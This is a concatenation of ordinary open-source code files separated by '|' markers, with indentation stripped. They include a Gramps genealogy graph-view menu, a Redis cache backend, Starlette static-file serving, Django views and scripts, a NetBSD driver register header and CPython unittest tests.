if m_handle:
spouse = self.dbstate.db.get_person_from_handle(m_handle)
self.add_menuitem(sp_menu, displayer.display(spouse),
self.graph_widget.move_to_person,
m_handle, True)
else:
add_menuitem(sp_menu, _('Add mother'), [family, 'mother'],
self.actions.add_spouse_to_family)
self.add_children_submenu(family=family)
# QuickReports section
self.add_separator()
q_exists = self.add_quickreport_submenu(CATEGORY_QR_FAMILY, handle)
if q_exists:
self.add_separator()
self.append_help_menu_entry()
def add_children_submenu(self, person=None, family=None):
"""
Go over children and build their menu.
"""
item, child_menu = self.add_submenu(_("Children"))
no_child = True
childlist = []
if family:
for child_ref in family.get_child_ref_list():
childlist.append(child_ref.ref)
# allow adding a child to this family
add_menuitem(child_menu, _('Add child to family'),
family.get_handle(), self.actions.add_child_to_family)
self.add_separator(child_menu)
no_child = False
elif person:
childlist = find_children(self.dbstate.db, person)
for child_handle in childlist:
child = self.dbstate.db.get_person_from_handle(child_handle)
if not child:
continue
if no_child:
no_child = False
if find_children(self.dbstate.db, child):
label = Gtk.Label(label='<b><i>%s</i></b>'
% escape(displayer.display(child)))
else:
label = Gtk.Label(label=escape(displayer.display(child)))
child_item = Gtk.MenuItem()
label.set_use_markup(True)
label.show()
label.set_halign(Gtk.Align.START)
child_item.add(label)
child_item.connect("activate", self.graph_widget.move_to_person,
child_handle, True)
child_item.show()
child_menu.append(child_item)
if no_child:
item.set_sensitive(0)
def add_menuitem(self, menu, label, func, *args):
"""
Adds menu item.
"""
item = Gtk.MenuItem(label=label)
item.connect("activate", func, *args)
item.show()
menu.append(item)
return item
def add_submenu(self, label):
"""
Adds submenu.
"""
item = Gtk.MenuItem(label=label)
item.set_submenu(Gtk.Menu())
item.show()
self.append(item)
submenu = item.get_submenu()
submenu.set_reserve_toggle_size(False)
return item, submenu
def add_separator(self, menu=None):
"""
Adds separator to menu.
"""
if menu is None:
menu = self
menu_item = Gtk.SeparatorMenuItem()
menu_item.show()
menu.append(menu_item)
def append_help_menu_entry(self):
"""
Adds help (about) menu entry.
"""
item = Gtk.MenuItem(label=_("About Graph View"))
item.connect("activate", self.actions.on_help_clicked)
item.show()
self.append(item)
class Actions(Callback):
"""
Define actions.
"""
__signals__ = {
'focus-person-changed' : (str, ),
'active-changed' : (str, ),
'rebuild-graph' : None,
}
def __init__(self, dbstate, uistate, bookmarks):
"""
bookmarks - person bookmarks from GraphView(NavigationView).
"""
Callback.__init__(self)
self.dbstate = dbstate
self.uistate = uistate
self.bookmarks = bookmarks
def on_help_clicked(self, widget):
"""
Display the relevant portion of Gramps manual.
"""
display_url(WIKI_PAGE)
def add_spouse(self, obj):
"""
Add a spouse to the person (create a new family for the person).
See: gramps/plugins/view/relview.py (add_spouse)
"""
handle = obj.get_data()
family = Family()
person = self.dbstate.db.get_person_from_handle(handle)
if not person:
return
if person.gender == Person.MALE:
family.set_father_handle(person.handle)
else:
family.set_mother_handle(person.handle)
try:
EditFamily(self.dbstate, self.uistate, [], family)
except WindowActiveError:
pass
# set edited person to scroll to it after rebuilding the graph
self.emit('focus-person-changed', (handle, ))
def add_spouse_to_family(self, obj):
"""
Adds spouse to existing family.
See: editfamily.py
"""
family, kind = obj.get_data()
try:
dialog = EditFamily(self.dbstate, self.uistate, [], family)
if kind == 'mother':
dialog.add_mother_clicked(None)
if kind == 'father':
dialog.add_father_clicked(None)
except WindowActiveError:
pass
def edit_person(self, obj, person_handle=None):
"""
Start a person editor for the selected person.
"""
if not (obj or person_handle):
return False
if person_handle:
handle = person_handle
else:
handle = obj.get_data()
person = self.dbstate.db.get_person_from_handle(handle)
try:
EditPerson(self.dbstate, self.uistate, [], person)
except WindowActiveError:
pass
# set edited person to scroll to it after rebuilding the graph
self.emit('focus-person-changed', (handle, ))
def set_home_person(self, obj):
"""
Set the home person for database and make it active.
"""
handle = obj.get_data()
person = self.dbstate.db.get_person_from_handle(handle)
if person:
self.dbstate.db.set_default_person_handle(handle)
self.emit('active-changed', (handle, ))
def edit_family(self, obj, family_handle=None):
"""
Start a family editor for the selected family.
"""
if not (obj or family_handle):
return False
if family_handle:
handle = family_handle
else:
handle = obj.get_data()
family = self.dbstate.db.get_family_from_handle(handle)
try:
EditFamily(self.dbstate, self.uistate, [], family)
except WindowActiveError:
pass
# pick a person from the edited family to scroll to after rebuilding the graph
f_handle = family.get_father_handle()
if f_handle:
self.emit('focus-person-changed', (f_handle, ))
else:
m_handle = family.get_mother_handle()
if m_handle:
self.emit('focus-person-changed', (m_handle, ))
def copy_person_to_clipboard(self, obj):
"""
Renders the person data into some lines of text
and puts that into the clipboard.
"""
person_handle = obj.get_data()
person = self.dbstate.db.get_person_from_handle(person_handle)
if person:
_cb = Gtk.Clipboard.get_for_display(Gdk.Display.get_default(),
Gdk.SELECTION_CLIPBOARD)
format_helper = FormattingHelper(self.dbstate)
_cb.set_text(format_helper.format_person(person, 11), -1)
return True
return False
def edit_tag_list(self, obj):
"""
Edit tag list for person or family.
"""
handle, otype = obj.get_data()
if otype == 'person':
target = self.dbstate.db.get_person_from_handle(handle)
self.emit('focus-person-changed', (handle, ))
elif otype == 'family':
target = self.dbstate.db.get_family_from_handle(handle)
f_handle = target.get_father_handle()
if f_handle:
self.emit('focus-person-changed', (f_handle, ))
else:
m_handle = target.get_mother_handle()
if m_handle:
self.emit('focus-person-changed', (m_handle, ))
else:
return False
if target:
tag_list = []
for tag_handle in target.get_tag_list():
tag = self.dbstate.db.get_tag_from_handle(tag_handle)
if tag:
tag_list.append((tag_handle, tag.get_name()))
all_tags = []
for tag_handle in self.dbstate.db.get_tag_handles(
sort_handles=True):
tag = self.dbstate.db.get_tag_from_handle(tag_handle)
all_tags.append((tag.get_handle(), tag.get_name()))
try:
editor = EditTagList(tag_list, all_tags, self.uistate, [])
if editor.return_list is not None:
tag_list = editor.return_list
# Save tags to target object.
# Make the dialog modal so that the user can't start
# another database transaction while the one setting
# tags is still running.
pmon = progressdlg.ProgressMonitor(
progressdlg.GtkProgressDialog,
("", self.uistate.window, Gtk.DialogFlags.MODAL),
popup_time=2)
status = progressdlg.LongOpStatus(msg=_("Adding Tags"),
total_steps=1,
interval=1 // 20)
pmon.add_op(status)
target.set_tag_list([item[0] for item in tag_list])
if otype == 'person':
msg = _('Adding Tags to person (%s)') % handle
with DbTxn(msg, self.dbstate.db) as trans:
self.dbstate.db.commit_person(target, trans)
status.heartbeat()
else:
msg = _('Adding Tags to family (%s)') % handle
with DbTxn(msg, self.dbstate.db) as trans:
self.dbstate.db.commit_family(target, trans)
status.heartbeat()
status.end()
except WindowActiveError:
pass
def organize_tags(self, obj):
"""
Display the Organize Tags dialog.
see: .gramps.gui.view.tags
"""
handle, otype = obj.get_data()
if otype == 'person':
target = self.dbstate.db.get_person_from_handle(handle)
self.emit('focus-person-changed', (handle, ))
elif otype == 'family':
target = self.dbstate.db.get_family_from_handle(handle)
f_handle = target.get_father_handle()
if f_handle:
self.emit('focus-person-changed', (f_handle, ))
else:
m_handle = target.get_mother_handle()
if m_handle:
self.emit('focus-person-changed', (m_handle, ))
OrganizeTagsDialog(self.dbstate.db, self.uistate, [])
self.emit('rebuild-graph')
def add_parents_to_person(self, obj):
"""
Open dialog to add parents to person.
"""
person_handle = obj.get_data()
family = Family()
childref = ChildRef()
childref.set_reference_handle(person_handle)
family.add_child_ref(childref)
try:
EditFamily(self.dbstate, self.uistate, [], family)
except WindowActiveError:
return
# set edited person to scroll to it after rebuilding the graph
self.emit('focus-person-changed', (person_handle, ))
def add_child_to_family(self, obj):
"""
Open person editor to create and add child to family.
"""
family_handle = obj.get_data()
callback = lambda x: self.__callback_add_child(x, family_handle)
person = Person()
name = Name()
# the editor requires a surname
name.add_surname(Surname())
name.set_primary_surname(0)
family = self.dbstate.db.get_family_from_handle(family_handle)
# try to get father
father_handle = family.get_father_handle()
if father_handle:
father = self.dbstate.db.get_person_from_handle(father_handle)
if father:
preset_name(father, name)
person.set_primary_name(name)
try:
EditPerson(self.dbstate, self.uistate, [], person,
callback=callback)
except WindowActiveError:
pass
def __callback_add_child(self, person, family_handle):
"""
Write data to db.
Callback from self.add_child_to_family().
"""
ref = ChildRef()
ref.ref = person.get_handle()
family = self.dbstate.db.get_family_from_handle(family_handle)
family.add_child_ref(ref)
with DbTxn(_("Add Child to Family"), self.dbstate.db) as trans:
# add parentref to child
person.add_parent_family_handle(family_handle)
# default relationship is used
self.dbstate.db.commit_person(person, trans)
# add child to family
self.dbstate.db.commit_family(family, trans)
def remove_person(self, obj):
"""
Remove a person from the database.
see: libpersonview.py
"""
person = obj.get_data()
msg1 = _('Delete %s?') % displayer.display(person)
msg2 = (_('Deleting the person [%s] will remove it '
'from the database.') % person.gramps_id)
dialog = QuestionDialog2(msg1, msg2,
_("Yes"), _("No"),
self.uistate.window)
if dialog.run():
# set the busy cursor, so the user knows that we are working
self.uistate.set_busy_cursor(True)
# create the transaction
with DbTxn('', self.dbstate.db) as trans:
# create description to save
description = (_("Delete Person (%s)")
% displayer.display(person))
# delete the person from the database
# Above will emit person-delete signal
self.dbstate.db.delete_person_from_database(person, trans)
trans.set_description(description)
self.uistate.set_busy_cursor(False)
def remove_family(self, obj):
"""
Remove a family from the database.
see: familyview.py
"""
family = obj.get_data()
msg1 = _('Delete family [%s]?') % family.gramps_id
msg2 = _('Deleting the family will remove it from the database.')
dialog = QuestionDialog2(msg1, msg2,
_("Yes"), _("No"),
self.uistate.window)
if dialog.run():
# set the busy cursor, so the user knows that we are working
self.uistate.set_busy_cursor(True)
# create the transaction
with DbTxn('', self.dbstate.db) as trans:
# create description to save
description = _("Delete Family [%s]") % family.gramps_id
# delete the family from the database
self.dbstate.db.remove_family_relationships(family.handle,
trans)
trans.set_description(description)
self.uistate.set_busy_cursor(False)
def add_to_bookmarks(self, obj):
"""
Adds bookmark for person.
See: navigationview.py and bookmarks.py
"""
handle, person = obj.get_data()
self.bookmarks.add(handle)
name = displayer.display(person)
self.uistate.push_message(self.dbstate,
_("%s has been bookmarked") % name)
def remove_from_bookmarks(self, obj):
"""
Remove person from the list of bookmarked people.
See: bookmarks.py
"""
handle = obj.get_data()
self.bookmarks.remove_handles([handle])
|
import pickle
import typing as _t
from cachelib.base import BaseCache
class RedisCache(BaseCache):
"""Uses the Redis key-value store as a cache backend.
The first argument can be either a string denoting address of the Redis
server or an object resembling an instance of a redis.Redis class.
Note: Python Redis API already takes care of encoding unicode strings on
the fly.
:param host: address of the Redis server or an object whose API is
compatible with the official Python Redis client (redis-py).
:param port: port number on which Redis server listens for connections.
:param password: password authentication for the Redis server.
:param db: db (zero-based numeric index) on the Redis server to connect to.
:param default_timeout: the default timeout that is used if no timeout is
specified on :meth:`~BaseCache.set`. A timeout of
0 indicates that the cache never expires.
:param key_prefix: A prefix that should be added to all keys.
Any additional keyword arguments will be passed to ``redis.Redis``.
"""
def __init__(
self,
host: str = "localhost",
port: int = 6379,
password: _t.Optional[str] = None,
db: int = 0,
default_timeout: int = 300,
key_prefix: _t.Optional[str] = None,
**kwargs: _t.Any
):
BaseCache.__init__(self, default_timeout)
if host is None:
raise ValueError("RedisCache host parameter may not be None")
if isinstance(host, str):
try:
import redis
except ImportError:
raise RuntimeError("no redis module found")
if kwargs.get("decode_responses", None):
raise ValueError("decode_responses is not supported by RedisCache.")
self._client = redis.Redis(
host=host, port=port, password=password, db=db, **kwargs
)
self.key_prefix = key_prefix or ""
def _normalize_timeout(self, timeout: _t.Optional[int]) -> int:
timeout = BaseCache._normalize_timeout(self, timeout)
if timeout == 0:
timeout = -1
return timeout
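# For example, _normalize_timeout(0) returns -1, which set()/set_many()
# interpret as "no expiry" (plain SET instead of SETEX).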
def dump_object(self, value: _t.Any) -> bytes:
"""Dumps an object into a string for redis. By default it serializes
integers as a regular string and pickle-dumps everything else.
"""
if type(value) == int:
return str(value).encode("ascii")
return b"!" + pickle.dumps(value)
def load_object(self, value: _t.Optional[bytes]) -> _t.Any:
"""The reversal of :meth:`dump_object`. This might be called with
None.
"""
if value is None:
return None
if value.startswith(b"!"):
try:
return pickle.loads(value[1:])
except pickle.PickleError:
return None
try:
return int(value)
except ValueError:
# before 0.8 we did not have serialization. Still support that.
return value
def get(self, key: str) -> _t.Any:
return self.load_object(self._client.get(self.key_prefix + key))
def get_many(self, *keys: str) -> _t.List[_t.Any]:
if self.key_prefix:
prefixed_keys = [self.key_prefix + key for key in keys]
else:
prefixed_keys = [k for k in keys]
return [self.load_object(x) for x in self._client.mget(prefixed_keys)]
def set(
self, key: str, value: _t.Any, timeout: _t.Optional[int] = None
) -> _t.Optional[bool]:
timeout = self._normalize_timeout(timeout)
dump = self.dump_object(value)
if timeout == -1:
result = self._client.set(name=self.key_prefix + key, value=dump)
else:
result = self._client.setex(
name=self.key_prefix + key, value=dump, time=timeout
)
return result
def add(self, key: str, value: _t.Any, timeout: _t.Optional[int] = None) -> bool:
timeout = self._normalize_timeout(timeout)
dump = self.dump_object(value)
return self._client.setnx(
name=self.key_prefix + key, value=dump
) and self._client.expire(name=self.key_prefix + key, time=timeout)
def set_many(
self, mapping: _t.Dict[str, _t.Any], timeout: _t.Optional[int] = None
) -> _t.List[_t.Any]:
timeout = self._normalize_timeout(timeout)
# Use transaction=False to batch without calling redis MULTI
# which is not supported by twemproxy
pipe = self._client.pipeline(transaction=False)
for key, value in mapping.items():
dump = self.dump_object(value)
if timeout == -1:
pipe.set(name=self.key_prefix + key, value=dump)
else:
pipe.setex(name=self.key_prefix + key, value=dump, time=timeout)
return pipe.execute()
def delete(self, key: str) -> int:
return self._client.delete(self.key_prefix + key)
def delete_many(self, *keys: str) -> _t.Optional[int]:
if not keys:
return None
if self.key_prefix:
prefixed_keys = [self.key_prefix + key for key in keys]
else:
prefixed_keys = [k for k in keys]
return self._client.delete(*prefixed_keys)
def has(self, key: str) -> int:
return self._client.exists(self.key_prefix + key)
def clear(self) -> int:
status = 0
if self.key_prefix:
keys = self._client.keys(self.key_prefix + "*")
if keys:
status = self._client.delete(*keys)
else:
status = self._client.flushdb()
return status
def inc(self, key: str, delta: int = 1) -> int:
return self._client.incr(name=self.key_prefix + key, amount=delta)
def dec(self, key: str, delta: int = 1) -> int:
return self._client.incr(name=self.key_prefix + key, amount=-delta)
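# A minimal usage sketch (assumes a Redis server reachable on localhost:6379;
# the key names are illustrative):
#
#   cache = RedisCache(host="localhost", port=6379, key_prefix="myapp:")
#   cache.set("answer", 42, timeout=60)   # SETEX myapp:answer 60 "42"
#   cache.get("answer")                   # -> 42
#   cache.inc("hits")                     # -> 1
#   cache.delete("answer")                # -> number of keys removed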
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'ExpenseTracker.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
#ifndef TESTCOMPUTECOMMONATTRIBUTES_H
#define TESTCOMPUTECOMMONATTRIBUTES_H
#include "../src/ShapePopulationBase.h"
#include <math.h>
class TestShapePopulationBase
{
public:
TestShapePopulationBase();
bool testComputeCommonAttributes(std::string filename, std::string filenameExpectedResult);
};
#endif // TESTCOMPUTECOMMONATTRIBUTES_H
|
const db = require("../db/conn");
const { Post, Community, User } = require("../models");
const postData = require("./postData.json");
const userData = require("./userData.json");
const communityData = require("./communityData.json");
db.once("open", async () => {
await Post.deleteMany({});
const post = await Post.insertMany(postData);
console.log("Posts seeded!");
await User.deleteMany({});
const user = await User.insertMany(userData);
console.log("Users seeded!");
await Community.deleteMany({});
const community = await Community.insertMany(communityData);
console.log("Communities seeded!");
process.exit(0);
});
|
import importlib.util
import os
import stat
import typing
from email.utils import parsedate
import anyio
from starlette.datastructures import URL, Headers
from starlette.exceptions import HTTPException
from starlette.responses import FileResponse, RedirectResponse, Response
from starlette.types import Receive, Scope, Send
PathLike = typing.Union[str, "os.PathLike[str]"]
class NotModifiedResponse(Response):
NOT_MODIFIED_HEADERS = (
"cache-control",
"content-location",
"date",
"etag",
"expires",
"vary",
)
def __init__(self, headers: Headers):
super().__init__(
status_code=304,
headers={
name: value
for name, value in headers.items()
if name in self.NOT_MODIFIED_HEADERS
},
)
class StaticFiles:
def __init__(
self,
*,
directory: PathLike = None,
packages: typing.List[typing.Union[str, typing.Tuple[str, str]]] = None,
html: bool = False,
check_dir: bool = True,
) -> None:
self.directory = directory
self.packages = packages
self.all_directories = self.get_directories(directory, packages)
self.html = html
self.config_checked = False
if check_dir and directory is not None and not os.path.isdir(directory):
raise RuntimeError(f"Directory '{directory}' does not exist")
def get_directories(
self,
directory: PathLike = None,
packages: typing.List[typing.Union[str, typing.Tuple[str, str]]] = None,
) -> typing.List[PathLike]:
"""
Given `directory` and `packages` arguments, return a list of all the
directories that should be used for serving static files from.
"""
directories = []
if directory is not None:
directories.append(directory)
for package in packages or []:
if isinstance(package, tuple):
package, statics_dir = package
else:
statics_dir = "statics"
spec = importlib.util.find_spec(package)
assert spec is not None, f"Package {package!r} could not be found."
assert spec.origin is not None, f"Package {package!r} could not be found."
package_directory = os.path.normpath(
os.path.join(spec.origin, "..", statics_dir)
)
assert os.path.isdir(
package_directory
), f"Directory '{statics_dir!r}' in package {package!r} could not be found."
directories.append(package_directory)
return directories
async def __call__(self, scope: Scope, receive: Receive, send: Send) -> None:
"""
The ASGI entry point.
"""
assert scope["type"] == "http"
if not self.config_checked:
await self.check_config()
self.config_checked = True
path = self.get_path(scope)
response = await self.get_response(path, scope)
await response(scope, receive, send)
def get_path(self, scope: Scope) -> str:
"""
Given the ASGI scope, return the `path` string to serve up,
with OS specific path separators, and any '..', '.' components removed.
"""
return os.path.normpath(os.path.join(*scope["path"].split("/")))
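# For example, a scope path of "/css/../img/logo.png" is normalized to
# "img/logo.png" (with OS-specific separators) before lookup_path() runs.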
async def get_response(self, path: str, scope: Scope) -> Response:
"""
Returns an HTTP response, given the incoming path, method and request headers.
"""
if scope["method"] not in ("GET", "HEAD"):
raise HTTPException(status_code=405)
try:
full_path, stat_result = await anyio.to_thread.run_sync(
self.lookup_path, path
)
except PermissionError:
raise HTTPException(status_code=401)
except OSError:
raise
if stat_result and stat.S_ISREG(stat_result.st_mode):
# We have a static file to serve.
return self.file_response(full_path, stat_result, scope)
elif stat_result and stat.S_ISDIR(stat_result.st_mode) and self.html:
# We're in HTML mode, and have got a directory URL.
# Check if we have 'index.html' file to serve.
index_path = os.path.join(path, "index.html")
full_path, stat_result = await anyio.to_thread.run_sync(
self.lookup_path, index_path
)
if stat_result is not None and stat.S_ISREG(stat_result.st_mode):
if not scope["path"].endswith("/"):
# Directory URLs should redirect to always end in "/".
url = URL(scope=scope)
url = url.replace(path=url.path + "/")
return RedirectResponse(url=url)
return self.file_response(full_path, stat_result, scope)
if self.html:
# Check for '404.html' if we're in HTML mode.
full_path, stat_result = await anyio.to_thread.run_sync(
self.lookup_path, "404.html"
)
if stat_result and stat.S_ISREG(stat_result.st_mode):
return FileResponse(
full_path,
stat_result=stat_result,
method=scope["method"],
status_code=404,
)
raise HTTPException(status_code=404)
def lookup_path(
self, path: str
) -> typing.Tuple[str, typing.Optional[os.stat_result]]:
for directory in self.all_directories:
full_path = os.path.realpath(os.path.join(directory, path))
directory = os.path.realpath(directory)
if os.path.commonprefix([full_path, directory]) != directory:
# Don't allow misbehaving clients to break out of the static files
# directory.
continue
try:
return full_path, os.stat(full_path)
except (FileNotFoundError, NotADirectoryError):
continue
return "", None
def file_response(
self,
full_path: PathLike,
stat_result: os.stat_result,
scope: Scope,
status_code: int = 200,
) -> Response:
method = scope["method"]
request_headers = Headers(scope=scope)
response = FileResponse(
full_path, status_code=status_code, stat_result=stat_result, method=method
)
if self.is_not_modified(response.headers, request_headers):
return NotModifiedResponse(response.headers)
return response
async def check_config(self) -> None:
"""
Perform a one-off configuration check that StaticFiles is actually
pointed at a directory, so that we can raise loud errors rather than
just returning 404 responses.
"""
if self.directory is None:
return
try:
stat_result = await anyio.to_thread.run_sync(os.stat, self.directory)
except FileNotFoundError:
raise RuntimeError(
f"StaticFiles directory '{self.directory}' does not exist."
)
if not (stat.S_ISDIR(stat_result.st_mode) or stat.S_ISLNK(stat_result.st_mode)):
raise RuntimeError(
f"StaticFiles path '{self.directory}' is not a directory."
)
def is_not_modified(
self, response_headers: Headers, request_headers: Headers
) -> bool:
"""
Given the request and response headers, return `True` if an HTTP
"Not Modified" response could be returned instead.
"""
try:
if_none_match = request_headers["if-none-match"]
etag = response_headers["etag"]
if if_none_match == etag:
return True
except KeyError:
pass
try:
if_modified_since = parsedate(request_headers["if-modified-since"])
last_modified = parsedate(response_headers["last-modified"])
if (
if_modified_since is not None
and last_modified is not None
and if_modified_since >= last_modified
):
return True
except KeyError:
pass
return False
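# A minimal usage sketch (hedged example; the directory name and mount path
# are illustrative, not part of this module):
#
#   from starlette.applications import Starlette
#   from starlette.routing import Mount
#
#   app = Starlette(routes=[
#       Mount("/static", app=StaticFiles(directory="static", html=True)),
#   ])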
|
import typescript from "rollup-plugin-typescript2"
import {nodeResolve} from "@rollup/plugin-node-resolve"
import commonJS from "@rollup/plugin-commonjs"
export default {
input: "./src/index.ts",
output: [{
format: "cjs",
file: "./dist/index.cjs",
externalLiveBindings: false
}, {
format: "es",
file: "./dist/index.js",
externalLiveBindings: false
}],
plugins: [
nodeResolve(),
commonJS(),
typescript({
check: false,
tsconfigOverride: {
compilerOptions: {
lib: ["es5", "es6"],
target: "es6",
strict: false,
declaration: true
}
},
include: ["src/*.ts"]
})
]
}
|
# -*- coding: utf-8 -*-
#import sys
#import os
#import sample
#def initialize():
# sys.path.insert(0, "C:\\Users\\usuario\\GIT\\Game\\sample")
# sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
import sys
import os
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
import sample
|
from django.contrib.auth.decorators import login_required
from django.shortcuts import get_object_or_404, redirect, render
from .forms import RecpieForm
from .models import Ingredient, Recipe, RecipeIngredient
@login_required
def food_recipe_list_view(request):
""" View: Get all recipies associated with the current user. """
qs = Recipe.objects.filter(user=request.user)
context = {
"recipes": qs,
}
return render(request, "food/recipe_list.html", context)
# @login_required
# def food_recipe_detail_view(request, id=None):
# """ View: Get the recipe details of a specific recipie. """
# obj = get_object_or_404(Recipe, id=id, user=request.user)
# context = {
# "recipe": obj
# }
# return render(request, "food/recipe_list.html", context)
@login_required
def food_recipe_create_view(request, id=None):
""" View: Create a new recipe associated with the current user. """
form = RecpieForm(request.POST or None)
context = {
"form": form
}
if form.is_valid():
obj = form.save(commit=False)
obj.user = request.user
obj.save()
return redirect(obj.get_absolute_url())
return render(request, "food/recipe_create.html", context)
@login_required
def food_recipe_edit_view(request, id=None):
""" View: Update an existing recipe associated with the current user. """
obj = get_object_or_404(Recipe, id=id, user=request.user)
form = RecpieForm(request.POST or None, instance=obj)
context = {
"form": form,
"object": obj
}
if form.is_valid():
form.save()
context['message'] = 'Data saved'
return redirect('/food/recipes/')
#return redirect(obj.get_absolute_url())
return render(request, "food/recipe_edit.html", context)
|
/* $NetBSD: fmvreg.h,v 1.1 2002/10/05 15:16:11 tsutsui Exp $ */
/*
* All Rights Reserved, Copyright (C) Fujitsu Limited 1995
*
* This software may be used, modified, copied, distributed, and sold,
* in both source and binary form provided that the above copyright,
* these terms and the following disclaimer are retained. The name of
* the author and/or the contributor may not be used to endorse or
* promote products derived from this software without specific prior
* written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND THE CONTRIBUTOR ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR THE CONTRIBUTOR BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
/*
* Hardware specification of various 86960/86965 based Ethernet cards.
* Contributed by M.S. <seki@sysrap.cs.fujitsu.co.jp>
*/
/*
* Registers on FMV-180 series' ISA bus interface ASIC.
* I'm not sure the following register names are appropriate.
* Doesn't it look silly, eh? FIXME.
*/
#define FE_FMV0 16 /* Hardware status. */
#define FE_FMV1 17 /* Hardware type? Always 0 */
#define FE_FMV2 18 /* Hardware configuration. */
#define FE_FMV3 19 /* Hardware enable. */
#define FE_FMV4 20 /* Station address #1 */
#define FE_FMV5 21 /* Station address #2 */
#define FE_FMV6 22 /* Station address #3 */
#define FE_FMV7 23 /* Station address #4 */
#define FE_FMV8 24 /* Station address #5 */
#define FE_FMV9 25 /* Station address #6 */
#define FE_FMV10 26 /* Unknown; to be set to 0. */
/*
* FMV-180 series' ASIC register values.
*/
/* Magic value in FMV0 register. */
#define FE_FMV0_MAGIC_MASK 0x78
#define FE_FMV0_MAGIC_VALUE 0x50
/* Model identification. */
#define FE_FMV0_MODEL 0x07
#define FE_FMV0_MODEL_FMV181 0x05 /* FMV-181/181A */
#define FE_FMV0_MODEL_FMV182 0x03 /* FMV-182/182A/184 */
#define FE_FMV0_MODEL_FMV183 0x04 /* FMV-183 */
/* Card type ID */
#define FE_FMV1_MAGIC_MASK 0xB0
#define FE_FMV1_MAGIC_VALUE 0x00
#define FE_FMV1_CARDID_REV 0x0F
#define FE_FMV1_CARDID_REV_A 0x01 /* FMV-181A/182A */
#define FE_FMV1_CARDID_PNP 0x08 /* FMV-183/184 */
/* I/O port address assignment. */
#define FE_FMV2_ADDR 0x07
#define FE_FMV2_ADDR_SHIFT 0
/* Boot ROM address assignment. */
#define FE_FMV2_ROM 0x38
#define FE_FMV2_ROM_SHIFT 3
/* IRQ assignment. */
#define FE_FMV2_IRQ 0xC0
#define FE_FMV2_IRQ_SHIFT 6
/* Hardware(?) enable flag. */
#define FE_FMV3_ENABLE_FLAG 0x80
/* Extra bits in FMV3 register. Always 0? */
#define FE_FMV3_EXTRA_MASK 0x7F
#define FE_FMV3_EXTRA_VALUE 0x00
|
import io
import sys
import textwrap
from test.support import warnings_helper, captured_stdout, captured_stderr
import traceback
import unittest
from unittest.util import strclass
class MockTraceback(object):
class TracebackException:
def __init__(self, *args, **kwargs):
self.capture_locals = kwargs.get('capture_locals', False)
def format(self):
result = ['A traceback']
if self.capture_locals:
result.append('locals')
return result
def restore_traceback():
unittest.result.traceback = traceback
def bad_cleanup1():
print('do cleanup1')
raise TypeError('bad cleanup1')
def bad_cleanup2():
print('do cleanup2')
raise ValueError('bad cleanup2')
class BufferedWriter:
def __init__(self):
self.result = ''
self.buffer = ''
def write(self, arg):
self.buffer += arg
def flush(self):
self.result += self.buffer
self.buffer = ''
def getvalue(self):
return self.result
class Test_TestResult(unittest.TestCase):
# Note: there are not separate tests for TestResult.wasSuccessful(),
# TestResult.errors, TestResult.failures, TestResult.testsRun or
# TestResult.shouldStop because these only have meaning in terms of
# other TestResult methods.
#
# Accordingly, tests for the aforenamed attributes are incorporated
# in with the tests for the defining methods.
################################################################
def test_init(self):
result = unittest.TestResult()
self.assertTrue(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 0)
self.assertEqual(result.shouldStop, False)
self.assertIsNone(result._stdout_buffer)
self.assertIsNone(result._stderr_buffer)
# "This method can be called to signal that the set of tests being
# run should be aborted by setting the TestResult's shouldStop
# attribute to True."
def test_stop(self):
result = unittest.TestResult()
result.stop()
self.assertEqual(result.shouldStop, True)
# "Called when the test case test is about to be run. The default
# implementation simply increments the instance's testsRun counter."
def test_startTest(self):
class Foo(unittest.TestCase):
def test_1(self):
pass
test = Foo('test_1')
result = unittest.TestResult()
result.startTest(test)
self.assertTrue(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
result.stopTest(test)
# "Called after the test case test has been executed, regardless of
# the outcome. The default implementation does nothing."
def test_stopTest(self):
class Foo(unittest.TestCase):
def test_1(self):
pass
test = Foo('test_1')
result = unittest.TestResult()
result.startTest(test)
self.assertTrue(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
result.stopTest(test)
# Same tests as above; make sure nothing has changed
self.assertTrue(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
# "Called before and after tests are run. The default implementation does nothing."
def test_startTestRun_stopTestRun(self):
result = unittest.TestResult()
result.startTestRun()
result.stopTestRun()
# "addSuccess(test)"
# ...
# "Called when the test case test succeeds"
# ...
# "wasSuccessful() - Returns True if all tests run so far have passed,
# otherwise returns False"
# ...
# "testsRun - The total number of tests run so far."
# ...
# "errors - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test which raised an
